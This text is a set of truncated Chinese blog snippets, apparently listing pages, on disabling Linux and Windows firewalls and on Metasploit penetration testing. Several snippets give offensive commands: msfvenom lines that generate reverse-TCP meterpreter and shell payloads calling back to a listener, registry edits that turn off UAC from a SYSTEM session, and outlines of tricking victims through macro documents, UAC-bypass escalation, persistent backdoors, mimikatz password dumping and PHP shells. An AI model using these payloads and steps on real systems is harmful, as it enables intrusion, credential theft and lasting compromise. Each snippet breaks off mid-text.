1.直接关闭防火墙systemctl stop firewalld.service #停止firewallsystemctl disable firewalld.service #禁止firewall开机启动firewall-cmd --state #查看默认防火墙状态(关闭后显示notrunning,开启后显示running)2.设置 iptables service[安装了就忽视]yum -y install iptables-services 如果要修改防火墙配置,如增加防火墙端口3306…
关闭UAC 如果你获得一个system权限的session 进入到这个session 进入到shell 依次输入以下命令 cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTW…
跳板 假设有这样一个场景,有一个局域网内网网关是1.1.1.1,局域网里的主机1是kali,它经过一个防火墙连接到公网,主机2和主机3在另一个内网网关为2.1.1.1的局域网,由于防火墙做了设置,只有主机2可以通过防火墙连接到公网,主机3无法通过防火墙连接到公网,但是主机2和主机3是互联的.两个局域网可以通过公网的路由相互连接. 防火墙1设置了端口映射规则,将防火墙的4444端口映射到主机1的4444端口,当主机1侦听本机的4444端口时相当于侦听防火墙的4444端口 主机1已经获得了主机2的s…
有时候,在环境需求下,需要关闭windows防火墙,UAC,以及IE选项配置. 对不懂电脑来说是比较麻烦的,老是得教他们,关键还记不住…… so,以下脚本就可以解决这个问题 注:脚本 需要右键 以管理员身份运行 #######脚本代码##按需修改######## @echo off REM 关闭系统 UAC(账户控制)goto start= 注册表位置 HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/Sy…
弱点扫描 根据信息收集的结果搜索漏洞利用模块 结合外部漏洞扫描系统对大IP地址段进行批量扫描 误报率.漏报率 VNC密码破解 客户端渗透 VBScript感染方式 利用  宏  感染word.excel文档 绕过某些基于文件类型检查的安全机制 一般人对word.excel的格式看来是没有安全威胁的,没有防范 生成Payload msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1…
1 查看防火墙状态 [root@lvxinghao ~]# systemctl status firewalld 2 查看开机是否启动防火墙服务[root@lvxinghao ~]# systemctl is-enabled firewalld 3 关闭防火墙[root@lvxinghao ~]# systemctl stop firewalld[root@lvxinghao ~]# systemctl status firewalld 4 禁用防火墙(系统启动时不启动防火墙服务)[root@l…
1 查看防火墙状态 [root@lvxinghao ~]# systemctl status firewalld 2 查看开机是否启动防火墙服务 [root@lvxinghao ~]# systemctl is-enabled firewalld 3 关闭防火墙 [root@lvxinghao ~]# systemctl stop firewalld [root@lvxinghao ~]# systemctl status firewalld 4 禁用防火墙(系统启动时不启动防火墙服务) [ro…
在无法通过网络边界的情况下转而攻击客户端----进行社会工程学攻击,进而渗透线上业务网络 含有漏洞利用代码的web站点--利用客户端漏洞 含有漏洞利用代码的doc,pdf等文档----诱使被害者执行payload 诱骗被害者执行payload(windows) msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -b "\x00" -e x86/shi…
对普通权限session提权 生成一个木马 开启Apache服务 将木马上传网页 被攻击者从这个网页上获取到这个木马 攻击者开启msf侦听 当被攻击者双击这个木马文件时 攻击者就获取到一个session 进入到这个session 加载priv模块getsystem提权,但是失败了,这是由于win7系统上UAC的限制 后退 使用提权模块ask 使用刚才那个没有提权权限的session 1 exploit 被攻击者就会收到一个对话框,如果点了yes 攻击者就会收到一个session sessions…
持续后门 先获取一个session 在目标主机上生成持续后门 设置侦听参数 启动侦听 重新启动被攻击的主机 一启动攻击者时获取到session mimikatz的使用 mimikatz是俄罗斯组织开发的工具 加载mimikatz help查看命令 msv获取用户名和hash wdigest获取内存中的明文密码信息 kerberos获取内存中的明文密码信息 查看hash 查看bootkey 查看被攻击主机上运行的进程 查看被攻击主机上运行的服务 查看被攻击主机的加密条件 PHP shell 生成一…